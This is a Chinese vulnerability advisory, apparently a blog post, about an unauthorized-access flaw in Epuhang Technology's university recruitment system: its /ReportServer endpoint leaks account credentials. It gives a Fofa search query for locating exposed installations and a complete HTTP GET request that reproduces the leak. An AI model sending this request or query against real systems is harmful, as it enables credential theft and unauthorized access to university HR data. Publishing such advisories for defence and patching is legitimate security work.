易普行科技高校招聘系统 ReportServer 敏感信息泄露

0x01 产品描述:

‌**易普行科技的高校招聘系统** ‌是一个专门为国内高校提供人力资源管理信息化服务的系统,由北京易普行科技有限公司开发。该公司总部位于北京市海淀区,并在上海、广州、南京、武汉、西安、成都等城市设有分支机构,业务覆盖全国各地区,已有众多高校用户,在业内树立了良好的口碑‌。
0x02 漏洞描述:

易普行科技高校招聘系统/ReportServer接口存在未授权访问泄露用户账号密码等重要数据,导致攻击者可通过泄露实现登录。
0x03 搜索语句:

Fofa:body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"


0x04 漏洞复现:

复制代码
GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
小能喵1 小时前
Kali Linux Wifi 伪造热点
linux·安全·kali·kali linux
小眼睛FPGA5 小时前
【RK3568+PG2L50H开发板实验例程】FPGA部分/紫光同创 IP core 的使用及添加
科技·嵌入式硬件·ai·fpga开发·gpu算力
浩浩测试一下6 小时前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
Fortinet_CHINA9 小时前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全
网安小白的进阶之路11 小时前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全
HumanRisk11 小时前
HumanRisk-自动化安全意识与合规教育平台方案
网络·安全·web安全·网络安全意识教育
文火冰糖的硅基工坊11 小时前
[创业之路-458]:企业经营层 - 蓝海战略 - 重构价值曲线、整合产业要素、创造新需求
科技·重构·架构·创业·业务
安全系统学习18 小时前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
永洪科技20 小时前
永洪科技荣获商业智能品牌影响力奖,全力打造”AI+决策”引擎
大数据·人工智能·科技·数据分析·数据可视化·bi
深圳安锐科技有限公司1 天前
深圳安锐科技发布国内首款4G 索力仪!让斜拉桥索力自动化监测更精准高效
运维·安全·自动化·自动化监测·人工监测·桥梁监测·索力监测